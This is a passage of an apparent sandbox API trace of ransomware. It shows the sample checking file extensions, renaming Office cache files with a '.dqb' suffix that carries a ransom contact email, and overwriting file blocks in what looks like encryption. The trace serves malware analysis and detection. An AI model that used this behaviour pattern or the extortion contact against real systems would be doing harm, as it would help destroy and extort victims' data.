(lpString1=".doc", lpString2=".msi") returned -1 [0045.712] lstrlenW (lpString=".docx") returned 5 [0045.712] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0045.712] lstrlenW (lpString=".pdf") returned 4 [0045.712] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0045.712] lstrlenW (lpString=".xls") returned 4 [0045.712] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0045.712] lstrlenW (lpString=".xlsx") returned 5 [0045.712] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0045.713] lstrlenW (lpString=".ppt") returned 4 [0045.713] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0045.713] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0045.713] lstrlenW (lpString=".zip") returned 4 [0045.713] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0045.713] lstrlenW (lpString=".rar") returned 4 [0045.713] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0045.713] lstrlenW (lpString=".bz2") returned 4 [0045.713] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0045.713] lstrlenW (lpString=".7z") returned 3 [0045.713] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0045.713] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0045.713] lstrlenW (lpString=".dbf") returned 4 [0045.713] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0045.713] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0045.713] lstrlenW (lpString=".1cd") returned 4 [0045.713] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0045.713] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0045.713] lstrlenW (lpString=".jpg") returned 4 [0045.713] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0045.713] lstrcmpiW (lpString1=".cab", lpString2=".dqb") returned -1 [0045.713] lstrlenW (lpString="ProPrWW2.cab") returned 12 [0045.713] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0045.714] GetFileSizeEx (in: hFile=0x1e4, lpFileSize=0x2b3ff1c | out: lpFileSize=0x2b3ff1c*=222948913) returned 1 [0045.714] CloseHandle (hObject=0x1e4) returned 1 [0045.714] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab")) returned 0x2020 [0045.714] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0045.714] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 1 [0045.714] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0045.714] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc6c | out: lpNewFilePointer=0x0) returned 1 [0045.714] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc2c | out: lpNewFilePointer=0x0) returned 1 [0045.714] ReadFile (in: hFile=0x1e4, lpBuffer=0x3650058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b3fc38, lpOverlapped=0x0 | out: lpBuffer=0x3650058*, lpNumberOfBytesRead=0x2b3fc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.723] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x46dfa10, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc2c | out: lpNewFilePointer=0x0) returned 1 [0045.723] ReadFile (in: hFile=0x1e4, lpBuffer=0x3690058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b3fc38, lpOverlapped=0x0 | out: lpBuffer=0x3690058*, lpNumberOfBytesRead=0x2b3fc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.730] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x2b3fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0045.730] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0xd45ee31, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc2c | out: lpNewFilePointer=0x0) returned 1 [0045.730] ReadFile (in: hFile=0x1e4, lpBuffer=0x36d0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b3fc38, lpOverlapped=0x0 | out: lpBuffer=0x36d0058*, lpNumberOfBytesRead=0x2b3fc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.945] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.945] WriteFile (in: hFile=0x1e4, lpBuffer=0x3650020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x2b3fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesWritten=0x2b3fcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0046.267] SetEndOfFile (hFile=0x1e4) returned 1 [0046.267] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40000) returned 0x3fc24e0 [0046.270] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc7c | out: lpNewFilePointer=0x0) returned 1 [0046.270] WriteFile (in: hFile=0x1e4, lpBuffer=0x3fc24e0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b3fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fc24e0*, lpNumberOfBytesWritten=0x2b3fc88*=0x40000, lpOverlapped=0x0) returned 1 [0046.271] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x46dfa10, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc7c | out: lpNewFilePointer=0x0) returned 1 [0046.271] WriteFile (in: hFile=0x1e4, lpBuffer=0x3fc24e0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b3fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fc24e0*, lpNumberOfBytesWritten=0x2b3fc88*=0x40000, lpOverlapped=0x0) returned 1 [0046.321] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0xd45ee31, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc7c | out: lpNewFilePointer=0x0) returned 1 [0046.323] WriteFile (in: hFile=0x1e4, lpBuffer=0x3fc24e0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b3fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fc24e0*, lpNumberOfBytesWritten=0x2b3fc88*=0x40000, lpOverlapped=0x0) returned 1 [0046.335] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3fc24e0 | out: hHeap=0x570000) returned 1 [0046.335] CloseHandle (hObject=0x1e4) returned 1 [0046.335] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0046.335] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0046.335] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0046.335] lstrlenW (lpString=".doc") returned 4 [0046.335] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0046.335] lstrlenW (lpString=".docx") returned 5 [0046.335] lstrcmpiW (lpString1=".docx", lpString2="2.cab") returned -1 [0046.335] lstrlenW (lpString=".pdf") returned 4 [0046.335] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0046.335] lstrlenW (lpString=".xls") returned 4 [0046.335] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0046.335] lstrlenW (lpString=".xlsx") returned 5 [0046.335] lstrcmpiW (lpString1=".xlsx", lpString2="2.cab") returned -1 [0046.335] lstrlenW (lpString=".ppt") returned 4 [0046.335] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0046.335] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0046.335] lstrlenW (lpString=".zip") returned 4 [0046.335] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0046.335] lstrlenW (lpString=".rar") returned 4 [0046.335] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0046.335] lstrlenW (lpString=".bz2") returned 4 [0046.335] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0046.336] lstrlenW (lpString=".7z") returned 3 [0046.336] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0046.336] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0046.336] lstrlenW (lpString=".dbf") returned 4 [0046.336] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0046.336] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0046.336] lstrlenW (lpString=".1cd") returned 4 [0046.336] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0046.336] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0046.336] lstrlenW (lpString=".jpg") returned 4 [0046.336] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0046.336] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0046.336] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0046.336] lstrlenW (lpString=".doc") returned 4 [0046.336] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0046.336] lstrlenW (lpString=".docx") returned 5 [0046.336] lstrcmpiW (lpString1=".docx", lpString2="2.cab") returned -1 [0046.336] lstrlenW (lpString=".pdf") returned 4 [0046.336] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0046.336] lstrlenW (lpString=".xls") returned 4 [0046.336] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0046.336] lstrlenW (lpString=".xlsx") returned 5 [0046.336] lstrcmpiW (lpString1=".xlsx", lpString2="2.cab") returned -1 [0046.336] lstrlenW (lpString=".ppt") returned 4 [0046.336] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0046.336] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0046.336] lstrlenW (lpString=".zip") returned 4 [0046.336] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0046.336] lstrlenW (lpString=".rar") returned 4 [0046.336] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0046.336] lstrlenW (lpString=".bz2") returned 4 [0046.336] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0046.336] lstrlenW (lpString=".7z") returned 3 [0046.336] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0046.336] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0046.337] lstrlenW (lpString=".dbf") returned 4 [0046.337] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0046.337] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0046.337] lstrlenW (lpString=".1cd") returned 4 [0046.337] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0046.337] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0046.337] lstrlenW (lpString=".jpg") returned 4 [0046.337] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0046.337] lstrcmpiW (lpString1=".cab", lpString2=".dqb") returned -1 [0046.337] lstrlenW (lpString="OWOW32WW.cab") returned 12 [0046.337] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0047.789] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2b3ff1c | out: lpFileSize=0x2b3ff1c*=36233052) returned 1 [0047.789] CloseHandle (hObject=0x160) returned 1 [0047.789] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab")) returned 0x2020 [0047.790] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0047.790] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 1 [0048.216] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0048.216] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc6c | out: lpNewFilePointer=0x0) returned 1 [0048.216] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc2c | out: lpNewFilePointer=0x0) returned 1 [0048.216] ReadFile (in: hFile=0x160, lpBuffer=0x3650058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b3fc38, lpOverlapped=0x0 | out: lpBuffer=0x3650058*, lpNumberOfBytesRead=0x2b3fc38*=0x40000, lpOverlapped=0x0) returned 1 [0048.399] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xb84a74, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc2c | out: lpNewFilePointer=0x0) returned 1 [0048.399] ReadFile (in: hFile=0x160, lpBuffer=0x3690058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b3fc38, lpOverlapped=0x0 | out: lpBuffer=0x3690058*, lpNumberOfBytesRead=0x2b3fc38*=0x40000, lpOverlapped=0x0) returned 1 [0048.520] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x2b3fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0048.525] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x224df5c, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc2c | out: lpNewFilePointer=0x0) returned 1 [0048.525] ReadFile (in: hFile=0x160, lpBuffer=0x36d0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b3fc38, lpOverlapped=0x0 | out: lpBuffer=0x36d0058*, lpNumberOfBytesRead=0x2b3fc38*=0x40000, lpOverlapped=0x0) returned 1 [0048.552] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.552] WriteFile (in: hFile=0x160, lpBuffer=0x3650020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x2b3fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesWritten=0x2b3fcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0048.569] SetEndOfFile (hFile=0x160) returned 1 [0048.569] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40000) returned 0x3f14078 [0048.656] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc7c | out: lpNewFilePointer=0x0) returned 1 [0048.656] WriteFile (in: hFile=0x160, lpBuffer=0x3f14078*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b3fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f14078*, lpNumberOfBytesWritten=0x2b3fc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.656] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xb84a74, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc7c | out: lpNewFilePointer=0x0) returned 1 [0048.656] WriteFile (in: hFile=0x160, lpBuffer=0x3f14078*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b3fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f14078*, lpNumberOfBytesWritten=0x2b3fc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.657] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x224df5c, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc7c | out: lpNewFilePointer=0x0) returned 1 [0048.657] WriteFile (in: hFile=0x160, lpBuffer=0x3f14078*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b3fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f14078*, lpNumberOfBytesWritten=0x2b3fc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.659] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3f14078 | out: hHeap=0x570000) returned 1 [0048.659] CloseHandle (hObject=0x160) returned 1 [0048.659] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0048.659] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.659] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.659] lstrlenW (lpString=".doc") returned 4 [0048.659] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0048.659] lstrlenW (lpString=".docx") returned 5 [0048.659] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0048.659] lstrlenW (lpString=".pdf") returned 4 [0048.659] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0048.659] lstrlenW (lpString=".xls") returned 4 [0048.659] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0048.659] lstrlenW (lpString=".xlsx") returned 5 [0048.659] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0048.660] lstrlenW (lpString=".ppt") returned 4 [0048.660] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0048.660] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.660] lstrlenW (lpString=".zip") returned 4 [0048.660] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0048.660] lstrlenW (lpString=".rar") returned 4 [0048.660] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0048.660] lstrlenW (lpString=".bz2") returned 4 [0048.660] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0048.660] lstrlenW (lpString=".7z") returned 3 [0048.660] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0048.660] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.660] lstrlenW (lpString=".dbf") returned 4 [0048.660] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0048.660] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.660] lstrlenW (lpString=".1cd") returned 4 [0048.660] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0048.660] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.660] lstrlenW (lpString=".jpg") returned 4 [0048.660] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0048.660] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.660] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.660] lstrlenW (lpString=".doc") returned 4 [0048.660] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0048.660] lstrlenW (lpString=".docx") returned 5 [0048.660] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0048.660] lstrlenW (lpString=".pdf") returned 4 [0048.660] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0048.660] lstrlenW (lpString=".xls") returned 4 [0048.660] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0048.660] lstrlenW (lpString=".xlsx") returned 5 [0048.660] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0048.660] lstrlenW (lpString=".ppt") returned 4 [0048.660] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0048.660] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.661] lstrlenW (lpString=".zip") returned 4 [0048.661] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0048.661] lstrlenW (lpString=".rar") returned 4 [0048.661] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0048.661] lstrlenW (lpString=".bz2") returned 4 [0048.661] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0048.661] lstrlenW (lpString=".7z") returned 3 [0048.661] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0048.661] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.661] lstrlenW (lpString=".dbf") returned 4 [0048.661] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0048.661] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.661] lstrlenW (lpString=".1cd") returned 4 [0048.661] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0048.661] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.661] lstrlenW (lpString=".jpg") returned 4 [0048.661] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0048.661] lstrcmpiW (lpString1=".cab", lpString2=".dqb") returned -1 [0048.661] lstrlenW (lpString="OWOW32WW.cab") returned 12 [0048.661] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0049.034] GetFileSizeEx (in: hFile=0x228, lpFileSize=0x2b3ff1c | out: lpFileSize=0x2b3ff1c*=36233052) returned 1 [0049.034] CloseHandle (hObject=0x228) returned 1 [0049.034] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab")) returned 0x2020 [0049.034] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0049.034] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 1 [0049.035] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0049.035] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc6c | out: lpNewFilePointer=0x0) returned 1 [0049.035] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc2c | out: lpNewFilePointer=0x0) returned 1 [0049.035] ReadFile (in: hFile=0x228, lpBuffer=0x3650058, 